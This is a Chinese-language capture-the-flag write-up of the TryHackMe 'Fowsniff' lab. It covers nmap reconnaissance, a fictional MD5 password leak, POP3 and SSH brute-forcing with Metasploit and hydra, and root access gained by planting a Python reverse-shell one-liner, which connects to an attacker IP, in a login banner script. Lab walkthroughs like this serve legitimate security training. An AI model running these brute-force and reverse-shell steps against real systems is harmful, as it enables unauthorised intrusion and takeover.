【THM】Fowsniff CTF
0x00 信息收集
我们得到ip之后先ping一下,看是否能ping通。可以ping通
我们使用nmap进行攻击性扫描,扫的有点慢,我们先访问一下他的web服务,然后再看一下nmap报告
┌──(root㉿Breeze)-[/home/breeze/Desktop]
└─# nmap 10.10.184.242 -sV -sS -A -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-17 19:30 CST
Nmap scan report for 10.10.184.242
Host is up (0.29s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
| 256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_ 256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fowsniff Corp - Delivering Solutions
| http-robots.txt: 1 disallowed entry
|_/
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING USER AUTH-RESP-CODE CAPA SASL(PLAIN) RESP-CODES UIDL TOP
143/tcp open imap Dovecot imapd
|_imap-capabilities: SASL-IR ID LOGIN-REFERRALS OK AUTH=PLAINA0001 have post-login ENABLE capabilities IMAP4rev1 listed Pre-login LITERAL+ more IDLE
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=5/17%OT=22%CT=1%CU=35826%PV=Y%DS=5%DC=T%G=Y%TM=6647
OS:401A%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=10B%TI=Z%CI=I%TS=8)SEQ(S
OS:P=109%GCD=1%ISR=10B%TI=Z%CI=RD%TS=8)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3
OS:=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=68DF%W2=6
OS:8DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=N)
Network Distance: 5 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 167.29 ms 10.17.0.1
2 ... 4
5 298.57 ms 10.10.184.242
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.75 seconds
我登录web页面,查看robots.txt也没有发现什么有用的信息,但是我发现了一个推特账号,于是进行社工。
社工到密码信息
0x01 爆破md5
FOWSNIFF CORP PASSWORD LEAK
''~``
( o o )
+-----.oooO--(_)--Oooo.------+
| |
| FOWSNIFF |
| got |
| PWN3D!!! |
| |
| .oooO |
| ( ) Oooo. |
+---------\ (----( )-------+
\_) ) /
(_/
FowSniff Corp got pwn3d by B1gN1nj4!
No one is safe from my 1337 skillz!
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e
Fowsniff Corporation Passwords LEAKED!
FOWSNIFF CORP PASSWORD DUMP!
Here are their email passwords dumped from their databases.
They left their pop3 server WIDE OPEN, too!
MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P
l8r n00bz!
B1gN1nj4
-------------------------------------------------------------------------------------------------
This list is entirely fictional and is part of a Capture the Flag educational challenge.
--- THIS IS NOT A REAL PASSWORD LEAK ---
All information contained within is invented solely for this purpose and does not correspond
to any real persons or organizations.
Any similarities to actual people or entities is purely coincidental and occurred accidentally.
-------------------------------------------------------------------------------------------------
sed -n 's/.*://p' 1.txt > hashes.txt
我们用这条命令将后面的hash值保存下来
我们尝试用hash解密
awk -F'@' '{print $1}' fowsniff.txt > users.txt
我们用这条命令将用户名导出来。
sed -n 's/.*://p' cracked.txt > pass.txt
用这个命令将密码文件保存下来
MSF获得访问权限
我们使用msf中的anxiliary/scanner/pop3/pop3_login
尝试暴力破解pop3服务
msf和九头蛇都爆破出来了!
我们直接nc登录,用user和pass登录,然后查看邮件
第一份邮件包括账号和密码
我们直接ssh登录
这里是密码。
我们用hydra进行攻击
直接登录ssh拿到shell
反弹shell
我们登入ssh发现有显示的横幅,应该是登入时有脚本运行
我们查看一下groups,查看一下当然用户所在的用户组。
我们查看一下users组的文件
find / -group users -type f 2>/dev/null
这个命令是用来查找系统中属于 "users" 用户组的所有普通文件(不包括目录)。
我们发现了 cube.sh
,vim编辑。写入python反弹shell脚本。改ip为攻击机ip,并且用nc开启监听。
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<IP>,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.17.48.147",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
我们用python3 -c 'import pty;pty.spawn("bin/bash")' 来获得一个稳定的shell
我们反弹后获得了root权限
直接完成任务